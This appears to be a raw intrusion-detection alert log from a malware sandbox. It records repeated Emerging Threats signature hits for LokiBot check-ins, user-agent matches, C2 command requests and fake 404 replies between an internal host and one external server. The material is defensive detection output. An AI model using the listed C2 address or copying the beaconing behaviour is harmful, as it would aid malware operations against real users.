                                      2024-10-24T17:02:20.447398+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549717188.114.96.380TCP
                                      2024-10-24T17:02:20.453090+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549717TCP
                                      2024-10-24T17:02:20.619456+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549735188.114.96.380TCP
                                      2024-10-24T17:02:20.619456+02002025381ET MALWARE LokiBot Checkin1192.168.2.549735188.114.96.380TCP
                                      2024-10-24T17:02:20.619456+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549735188.114.96.380TCP
                                      2024-10-24T17:02:21.532098+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549735188.114.96.380TCP
                                      2024-10-24T17:02:21.532098+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549735188.114.96.380TCP
                                      2024-10-24T17:02:21.539727+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549735TCP
                                      2024-10-24T17:02:21.691587+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549745188.114.96.380TCP
                                      2024-10-24T17:02:21.691587+02002025381ET MALWARE LokiBot Checkin1192.168.2.549745188.114.96.380TCP
                                      2024-10-24T17:02:21.691587+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549745188.114.96.380TCP
                                      2024-10-24T17:02:22.993659+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549745188.114.96.380TCP
                                      2024-10-24T17:02:22.993659+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549745188.114.96.380TCP
                                      2024-10-24T17:02:22.999018+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549745TCP
                                      2024-10-24T17:02:23.211146+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549757188.114.96.380TCP
                                      2024-10-24T17:02:23.211146+02002025381ET MALWARE LokiBot Checkin1192.168.2.549757188.114.96.380TCP
                                      2024-10-24T17:02:23.211146+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549757188.114.96.380TCP
                                      2024-10-24T17:02:24.412934+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549757188.114.96.380TCP
                                      2024-10-24T17:02:24.412934+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549757188.114.96.380TCP
                                      2024-10-24T17:02:24.418373+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549757TCP
                                      2024-10-24T17:02:24.561675+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549763188.114.96.380TCP
                                      2024-10-24T17:02:24.561675+02002025381ET MALWARE LokiBot Checkin1192.168.2.549763188.114.96.380TCP
                                      2024-10-24T17:02:24.561675+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549763188.114.96.380TCP
                                      2024-10-24T17:02:25.588806+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549763188.114.96.380TCP
                                      2024-10-24T17:02:25.588806+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549763188.114.96.380TCP
                                      2024-10-24T17:02:25.594776+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549763TCP
                                      2024-10-24T17:02:25.747925+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549774188.114.96.380TCP
                                      2024-10-24T17:02:25.747925+02002025381ET MALWARE LokiBot Checkin1192.168.2.549774188.114.96.380TCP
                                      2024-10-24T17:02:25.747925+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549774188.114.96.380TCP
                                      2024-10-24T17:02:26.637709+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549774188.114.96.380TCP
                                      2024-10-24T17:02:26.637709+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549774188.114.96.380TCP
                                      2024-10-24T17:02:26.643572+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549774TCP
                                      2024-10-24T17:02:26.794870+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549780188.114.96.380TCP
                                      2024-10-24T17:02:26.794870+02002025381ET MALWARE LokiBot Checkin1192.168.2.549780188.114.96.380TCP
                                      2024-10-24T17:02:26.794870+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549780188.114.96.380TCP
                                      2024-10-24T17:02:27.669186+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549780188.114.96.380TCP
                                      2024-10-24T17:02:27.669186+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549780188.114.96.380TCP
                                      2024-10-24T17:02:27.675985+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549780TCP
                                      2024-10-24T17:02:27.825461+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549786188.114.96.380TCP
                                      2024-10-24T17:02:27.825461+02002025381ET MALWARE LokiBot Checkin1192.168.2.549786188.114.96.380TCP
                                      2024-10-24T17:02:27.825461+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549786188.114.96.380TCP
                                      2024-10-24T17:02:28.718139+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549786188.114.96.380TCP
                                      2024-10-24T17:02:28.718139+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549786188.114.96.380TCP
                                      2024-10-24T17:02:28.723928+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549786TCP
                                      2024-10-24T17:02:28.879212+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549792188.114.96.380TCP
                                      2024-10-24T17:02:28.879212+02002025381ET MALWARE LokiBot Checkin1192.168.2.549792188.114.96.380TCP
                                      2024-10-24T17:02:28.879212+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549792188.114.96.380TCP
                                      2024-10-24T17:02:29.781591+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549792188.114.96.380TCP
                                      2024-10-24T17:02:29.781591+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549792188.114.96.380TCP
                                      2024-10-24T17:02:29.787110+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549792TCP
                                      2024-10-24T17:02:29.936630+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549798188.114.96.380TCP
                                      2024-10-24T17:02:29.936630+02002025381ET MALWARE LokiBot Checkin1192.168.2.549798188.114.96.380TCP
                                      2024-10-24T17:02:29.936630+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549798188.114.96.380TCP
                                      2024-10-24T17:02:30.857303+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549798188.114.96.380TCP
                                      2024-10-24T17:02:30.857303+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549798188.114.96.380TCP
                                      2024-10-24T17:02:30.862976+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549798TCP
                                      2024-10-24T17:02:31.015360+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549806188.114.96.380TCP
                                      2024-10-24T17:02:31.015360+02002025381ET MALWARE LokiBot Checkin1192.168.2.549806188.114.96.380TCP
                                      2024-10-24T17:02:31.015360+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549806188.114.96.380TCP
                                      2024-10-24T17:02:33.136591+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549806188.114.96.380TCP
                                      2024-10-24T17:02:33.136591+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549806188.114.96.380TCP
                                      2024-10-24T17:02:33.141972+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549806TCP
                                      2024-10-24T17:02:33.298933+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549820188.114.96.380TCP
                                      2024-10-24T17:02:33.298933+02002025381ET MALWARE LokiBot Checkin1192.168.2.549820188.114.96.380TCP
                                      2024-10-24T17:02:33.298933+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549820188.114.96.380TCP
                                      2024-10-24T17:02:34.213681+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549820188.114.96.380TCP
                                      2024-10-24T17:02:34.213681+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549820188.114.96.380TCP
                                      2024-10-24T17:02:34.219047+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549820TCP
                                      2024-10-24T17:02:34.372256+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549826188.114.96.380TCP
                                      2024-10-24T17:02:34.372256+02002025381ET MALWARE LokiBot Checkin1192.168.2.549826188.114.96.380TCP
                                      2024-10-24T17:02:34.372256+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549826188.114.96.380TCP
                                      2024-10-24T17:02:35.272272+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549826188.114.96.380TCP
                                      2024-10-24T17:02:35.272272+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549826188.114.96.380TCP
                                      2024-10-24T17:02:35.421423+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549832188.114.96.380TCP
                                      2024-10-24T17:02:35.421423+02002025381ET MALWARE LokiBot Checkin1192.168.2.549832188.114.96.380TCP
                                      2024-10-24T17:02:35.421423+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549832188.114.96.380TCP
                                      2024-10-24T17:02:37.391379+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549832188.114.96.380TCP
                                      2024-10-24T17:02:37.391379+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549832188.114.96.380TCP
                                      2024-10-24T17:02:37.397824+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549832TCP
                                      2024-10-24T17:02:37.545568+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549845188.114.96.380TCP
                                      2024-10-24T17:02:37.545568+02002025381ET MALWARE LokiBot Checkin1192.168.2.549845188.114.96.380TCP
                                      2024-10-24T17:02:37.545568+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549845188.114.96.380TCP
                                      2024-10-24T17:02:38.478307+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549845188.114.96.380TCP
                                      2024-10-24T17:02:38.478307+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549845188.114.96.380TCP
                                      2024-10-24T17:02:38.638011+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549853188.114.96.380TCP
                                      2024-10-24T17:02:38.638011+02002025381ET MALWARE LokiBot Checkin1192.168.2.549853188.114.96.380TCP
                                      2024-10-24T17:02:38.638011+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549853188.114.96.380TCP
                                      2024-10-24T17:02:39.504866+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549853188.114.96.380TCP
                                      2024-10-24T17:02:39.504866+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549853188.114.96.380TCP
                                      2024-10-24T17:02:39.510265+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549853TCP
                                      2024-10-24T17:02:39.658318+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549859188.114.96.380TCP
                                      2024-10-24T17:02:39.658318+02002025381ET MALWARE LokiBot Checkin1192.168.2.549859188.114.96.380TCP
                                      2024-10-24T17:02:39.658318+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549859188.114.96.380TCP
                                      2024-10-24T17:02:40.706963+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549859188.114.96.380TCP
                                      2024-10-24T17:02:40.706963+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549859188.114.96.380TCP
                                      2024-10-24T17:02:40.712629+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549859TCP
                                      2024-10-24T17:02:40.998847+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549866188.114.96.380TCP
                                      2024-10-24T17:02:40.998847+02002025381ET MALWARE LokiBot Checkin1192.168.2.549866188.114.96.380TCP
                                      2024-10-24T17:02:40.998847+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549866188.114.96.380TCP
                                      2024-10-24T17:02:42.062394+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549866188.114.96.380TCP
                                      2024-10-24T17:02:42.062394+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549866188.114.96.380TCP
                                      2024-10-24T17:02:42.068199+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549866TCP
                                      2024-10-24T17:02:42.218170+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549875188.114.96.380TCP
                                      2024-10-24T17:02:42.218170+02002025381ET MALWARE LokiBot Checkin1192.168.2.549875188.114.96.380TCP
                                      2024-10-24T17:02:42.218170+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549875188.114.96.380TCP
                                      2024-10-24T17:02:43.137633+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549875188.114.96.380TCP
                                      2024-10-24T17:02:43.137633+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549875188.114.96.380TCP
                                      2024-10-24T17:02:43.143302+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549875TCP
                                      2024-10-24T17:02:43.317732+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549881188.114.96.380TCP
                                      2024-10-24T17:02:43.317732+02002025381ET MALWARE LokiBot Checkin1192.168.2.549881188.114.96.380TCP
                                      2024-10-24T17:02:43.317732+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549881188.114.96.380TCP
                                      2024-10-24T17:02:45.392280+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549881188.114.96.380TCP
                                      2024-10-24T17:02:45.392280+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549881188.114.96.380TCP
                                      2024-10-24T17:02:45.397964+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549881TCP
                                      2024-10-24T17:02:45.544944+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549893188.114.96.380TCP
                                      2024-10-24T17:02:45.544944+02002025381ET MALWARE LokiBot Checkin1192.168.2.549893188.114.96.380TCP
                                      2024-10-24T17:02:45.544944+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549893188.114.96.380TCP
                                      2024-10-24T17:02:46.416414+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549893188.114.96.380TCP
                                      2024-10-24T17:02:46.416414+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549893188.114.96.380TCP
                                      2024-10-24T17:02:46.421855+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549893TCP
                                      2024-10-24T17:02:46.580422+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549899188.114.96.380TCP
                                      2024-10-24T17:02:46.580422+02002025381ET MALWARE LokiBot Checkin1192.168.2.549899188.114.96.380TCP
                                      2024-10-24T17:02:46.580422+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549899188.114.96.380TCP
                                      2024-10-24T17:02:47.642217+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549899188.114.96.380TCP
                                      2024-10-24T17:02:47.642217+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549899188.114.96.380TCP
                                      2024-10-24T17:02:47.648909+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549899TCP
                                      2024-10-24T17:02:47.796961+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549907188.114.96.380TCP
                                      2024-10-24T17:02:47.796961+02002025381ET MALWARE LokiBot Checkin1192.168.2.549907188.114.96.380TCP
                                      2024-10-24T17:02:47.796961+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549907188.114.96.380TCP
                                      2024-10-24T17:02:50.896699+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549907188.114.96.380TCP
                                      2024-10-24T17:02:50.896699+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549907188.114.96.380TCP
                                      2024-10-24T17:02:50.902069+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549907TCP
                                      2024-10-24T17:02:51.046250+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549925188.114.96.380TCP
                                      2024-10-24T17:02:51.046250+02002025381ET MALWARE LokiBot Checkin1192.168.2.549925188.114.96.380TCP
                                      2024-10-24T17:02:51.046250+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549925188.114.96.380TCP
                                      2024-10-24T17:02:53.493288+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549925188.114.96.380TCP
                                      2024-10-24T17:02:53.493288+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549925188.114.96.380TCP
                                      2024-10-24T17:02:53.499004+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549925TCP
                                      2024-10-24T17:02:53.656102+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549941188.114.96.380TCP
                                      2024-10-24T17:02:53.656102+02002025381ET MALWARE LokiBot Checkin1192.168.2.549941188.114.96.380TCP
                                      2024-10-24T17:02:53.656102+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549941188.114.96.380TCP
                                      2024-10-24T17:02:58.098284+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549941188.114.96.380TCP
                                      2024-10-24T17:02:58.098284+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549941188.114.96.380TCP
                                      2024-10-24T17:02:58.103765+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549941TCP
                                      2024-10-24T17:02:58.245581+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549963188.114.96.380TCP
                                      2024-10-24T17:02:58.245581+02002025381ET MALWARE LokiBot Checkin1192.168.2.549963188.114.96.380TCP
                                      2024-10-24T17:02:58.245581+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549963188.114.96.380TCP
                                      2024-10-24T17:02:59.277600+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549963188.114.96.380TCP
                                      2024-10-24T17:02:59.277600+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549963188.114.96.380TCP
                                      2024-10-24T17:02:59.282996+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549963TCP
                                      2024-10-24T17:02:59.443401+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549968188.114.96.380TCP
                                      2024-10-24T17:02:59.443401+02002025381ET MALWARE LokiBot Checkin1192.168.2.549968188.114.96.380TCP
                                      2024-10-24T17:02:59.443401+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549968188.114.96.380TCP
                                      2024-10-24T17:03:00.368673+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549968188.114.96.380TCP
                                      2024-10-24T17:03:00.368673+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549968188.114.96.380TCP
                                      2024-10-24T17:03:00.374881+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549968TCP
                                      2024-10-24T17:03:00.546134+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549972188.114.96.380TCP
                                      2024-10-24T17:03:00.546134+02002025381ET MALWARE LokiBot Checkin1192.168.2.549972188.114.96.380TCP
                                      2024-10-24T17:03:00.546134+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549972188.114.96.380TCP
                                      2024-10-24T17:03:01.522800+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549972188.114.96.380TCP
                                      2024-10-24T17:03:01.522800+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549972188.114.96.380TCP
                                      2024-10-24T17:03:01.528668+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549972TCP
                                      2024-10-24T17:03:01.672985+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549976188.114.96.380TCP
                                      2024-10-24T17:03:01.672985+02002025381ET MALWARE LokiBot Checkin1192.168.2.549976188.114.96.380TCP
                                      2024-10-24T17:03:01.672985+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549976188.114.96.380TCP
                                      2024-10-24T17:03:03.971789+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549976188.114.96.380TCP
                                      2024-10-24T17:03:03.971789+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549976188.114.96.380TCP
                                      2024-10-24T17:03:03.977388+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549976TCP
                                      2024-10-24T17:03:04.124054+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549980188.114.96.380TCP
                                      2024-10-24T17:03:04.124054+02002025381ET MALWARE LokiBot Checkin1192.168.2.549980188.114.96.380TCP
                                      2024-10-24T17:03:04.124054+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549980188.114.96.380TCP
                                      2024-10-24T17:03:05.022507+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549980188.114.96.380TCP
                                      2024-10-24T17:03:05.022507+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549980188.114.96.380TCP
                                      2024-10-24T17:03:05.027946+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549980TCP
                                      2024-10-24T17:03:05.169370+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549983188.114.96.380TCP
                                      2024-10-24T17:03:05.169370+02002025381ET MALWARE LokiBot Checkin1192.168.2.549983188.114.96.380TCP
                                      2024-10-24T17:03:05.169370+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549983188.114.96.380TCP
                                      2024-10-24T17:03:06.083279+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549983188.114.96.380TCP
                                      2024-10-24T17:03:06.083279+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549983188.114.96.380TCP
                                      2024-10-24T17:03:06.088782+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549983TCP
                                      2024-10-24T17:03:06.232216+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549987188.114.96.380TCP
                                      2024-10-24T17:03:06.232216+02002025381ET MALWARE LokiBot Checkin1192.168.2.549987188.114.96.380TCP
                                      2024-10-24T17:03:06.232216+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549987188.114.96.380TCP
                                      2024-10-24T17:03:07.269902+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549987188.114.96.380TCP
                                      2024-10-24T17:03:07.269902+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549987188.114.96.380TCP
                                      2024-10-24T17:03:07.280784+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549987TCP
                                      2024-10-24T17:03:07.418539+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549990188.114.96.380TCP
                                      2024-10-24T17:03:07.418539+02002025381ET MALWARE LokiBot Checkin1192.168.2.549990188.114.96.380TCP
                                      2024-10-24T17:03:07.418539+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549990188.114.96.380TCP
                                      2024-10-24T17:03:08.761558+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549990188.114.96.380TCP
                                      2024-10-24T17:03:08.761558+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549990188.114.96.380TCP
                                      2024-10-24T17:03:08.767099+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549990TCP
                                      2024-10-24T17:03:08.919860+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549995188.114.96.380TCP
                                      2024-10-24T17:03:08.919860+02002025381ET MALWARE LokiBot Checkin1192.168.2.549995188.114.96.380TCP
                                      2024-10-24T17:03:08.919860+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549995188.114.96.380TCP
                                      2024-10-24T17:03:11.602829+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549995188.114.96.380TCP
                                      2024-10-24T17:03:11.602829+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549995188.114.96.380TCP
                                      2024-10-24T17:03:11.609453+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.549995TCP
                                      2024-10-24T17:03:11.777745+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550002188.114.96.380TCP
                                      2024-10-24T17:03:11.777745+02002025381ET MALWARE LokiBot Checkin1192.168.2.550002188.114.96.380TCP
                                      2024-10-24T17:03:11.777745+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550002188.114.96.380TCP
                                      2024-10-24T17:03:15.147284+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550002188.114.96.380TCP
                                      2024-10-24T17:03:15.147284+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550002188.114.96.380TCP
                                      2024-10-24T17:03:15.153010+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550002TCP
                                      2024-10-24T17:03:15.310031+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550010188.114.96.380TCP
                                      2024-10-24T17:03:15.310031+02002025381ET MALWARE LokiBot Checkin1192.168.2.550010188.114.96.380TCP
                                      2024-10-24T17:03:15.310031+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550010188.114.96.380TCP
                                      2024-10-24T17:03:16.206577+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550010188.114.96.380TCP
                                      2024-10-24T17:03:16.206577+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550010188.114.96.380TCP
                                      2024-10-24T17:03:16.212370+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550010TCP
                                      2024-10-24T17:03:16.352682+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550013188.114.96.380TCP
                                      2024-10-24T17:03:16.352682+02002025381ET MALWARE LokiBot Checkin1192.168.2.550013188.114.96.380TCP
                                      2024-10-24T17:03:16.352682+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550013188.114.96.380TCP
                                      2024-10-24T17:03:17.263597+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550013188.114.96.380TCP
                                      2024-10-24T17:03:17.263597+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550013188.114.96.380TCP
                                      2024-10-24T17:03:17.269422+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550013TCP
                                      2024-10-24T17:03:17.420331+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550019188.114.96.380TCP
                                      2024-10-24T17:03:17.420331+02002025381ET MALWARE LokiBot Checkin1192.168.2.550019188.114.96.380TCP
                                      2024-10-24T17:03:17.420331+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550019188.114.96.380TCP
                                      2024-10-24T17:03:18.465606+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550019188.114.96.380TCP
                                      2024-10-24T17:03:18.465606+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550019188.114.96.380TCP
                                      2024-10-24T17:03:18.480624+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550019TCP
                                      2024-10-24T17:03:18.620369+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550022188.114.96.380TCP
                                      2024-10-24T17:03:18.620369+02002025381ET MALWARE LokiBot Checkin1192.168.2.550022188.114.96.380TCP
                                      2024-10-24T17:03:18.620369+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550022188.114.96.380TCP
                                      2024-10-24T17:03:19.665855+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550022188.114.96.380TCP
                                      2024-10-24T17:03:19.665855+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550022188.114.96.380TCP
                                      2024-10-24T17:03:19.671516+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550022TCP
                                      2024-10-24T17:03:19.829825+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550023188.114.96.380TCP
                                      2024-10-24T17:03:19.829825+02002025381ET MALWARE LokiBot Checkin1192.168.2.550023188.114.96.380TCP
